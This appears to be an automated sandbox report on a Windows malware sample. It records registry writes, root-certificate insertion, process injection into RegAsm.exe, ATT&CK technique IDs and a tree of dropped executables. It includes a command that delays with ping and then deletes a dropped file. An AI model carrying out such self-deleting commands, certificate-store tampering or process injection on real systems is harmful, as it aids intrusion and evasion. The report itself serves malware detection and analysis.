Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

FUCKER.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	FUCKER.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	FUCKER.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	FUCKER.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	FUCKER.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	FUCKER.exe

Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

3100 PING.EXE
1064 PING.EXE
3928 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

first.exe

pid process

1872 first.exe

pid	process
3100	PING.EXE
1064	PING.EXE
3928	PING.EXE

pid	process
1872	first.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

syncUpd.exed21cbe21e38b385a41a68c5e6dd32f4c.exed21cbe21e38b385a41a68c5e6dd32f4c.exepowershell.exepowershell.exe

pid	process
1984	syncUpd.exe
540	d21cbe21e38b385a41a68c5e6dd32f4c.exe
1984	syncUpd.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
384	powershell.exe
2544	powershell.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

350630453.exe

pid process

2692 350630453.exe

pid	process
2692	350630453.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

FUCKER.exeRegAsm.exefirst.exed21cbe21e38b385a41a68c5e6dd32f4c.exema.exepowershell.exepowershell.exe.exe

description	pid	process
Token: SeDebugPrivilege	2040	FUCKER.exe
Token: SeDebugPrivilege	1512	RegAsm.exe
Token: SeDebugPrivilege	1872	first.exe
Token: SeDebugPrivilege	540	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeImpersonatePrivilege	540	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeDebugPrivilege	2716	ma.exe
Token: SeDebugPrivilege	384	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	984	.exe
Token: SeDebugPrivilege	1872	first.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FUCKER.exeappdata.exeswiiii.exeRegAsm.exe

description	pid	process	target process
PID 2040 wrote to memory of 1984	2040	FUCKER.exe	syncUpd.exe
PID 2040 wrote to memory of 1984	2040	FUCKER.exe	syncUpd.exe
PID 2040 wrote to memory of 1984	2040	FUCKER.exe	syncUpd.exe
PID 2040 wrote to memory of 1984	2040	FUCKER.exe	syncUpd.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 1704	2040	FUCKER.exe	ISetup10.exe
PID 2040 wrote to memory of 540	2040	FUCKER.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2040 wrote to memory of 540	2040	FUCKER.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2040 wrote to memory of 540	2040	FUCKER.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2040 wrote to memory of 540	2040	FUCKER.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
PID 2040 wrote to memory of 1608	2040	FUCKER.exe	appdata.exe
PID 2040 wrote to memory of 1608	2040	FUCKER.exe	appdata.exe
PID 2040 wrote to memory of 1608	2040	FUCKER.exe	appdata.exe
PID 2040 wrote to memory of 1608	2040	FUCKER.exe	appdata.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 2812	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 1608 wrote to memory of 1512	1608	appdata.exe	RegAsm.exe
PID 2040 wrote to memory of 1872	2040	FUCKER.exe	first.exe
PID 2040 wrote to memory of 1872	2040	FUCKER.exe	first.exe
PID 2040 wrote to memory of 1872	2040	FUCKER.exe	first.exe
PID 2040 wrote to memory of 1872	2040	FUCKER.exe	first.exe
PID 2040 wrote to memory of 2852	2040	FUCKER.exe	pinf.exe
PID 2040 wrote to memory of 2852	2040	FUCKER.exe	pinf.exe
PID 2040 wrote to memory of 2852	2040	FUCKER.exe	pinf.exe
PID 2040 wrote to memory of 2852	2040	FUCKER.exe	pinf.exe
PID 2040 wrote to memory of 948	2040	FUCKER.exe	swiiii.exe
PID 2040 wrote to memory of 948	2040	FUCKER.exe	swiiii.exe
PID 2040 wrote to memory of 948	2040	FUCKER.exe	swiiii.exe
PID 2040 wrote to memory of 948	2040	FUCKER.exe	swiiii.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 948 wrote to memory of 2080	948	swiiii.exe	RegAsm.exe
PID 2080 wrote to memory of 2464	2080	RegAsm.exe	WerFault.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3632 attrib.exe

pid	process
3632	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCBAEHCAEG.exe"
3⤵
- Loads dropped DLL
PID:572

C:\Users\Admin\AppData\Local\Temp\FCBAEHCAEG.exe
"C:\Users\Admin\AppData\Local\Temp\FCBAEHCAEG.exe"
4⤵
- Executes dropped EXE
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\FCBAEHCAEG.exe
5⤵
PID:3064

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:1064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HJJECBKKEC.exe"
3⤵
PID:472

C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe"
2⤵
- Executes dropped EXE
PID:1704

C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
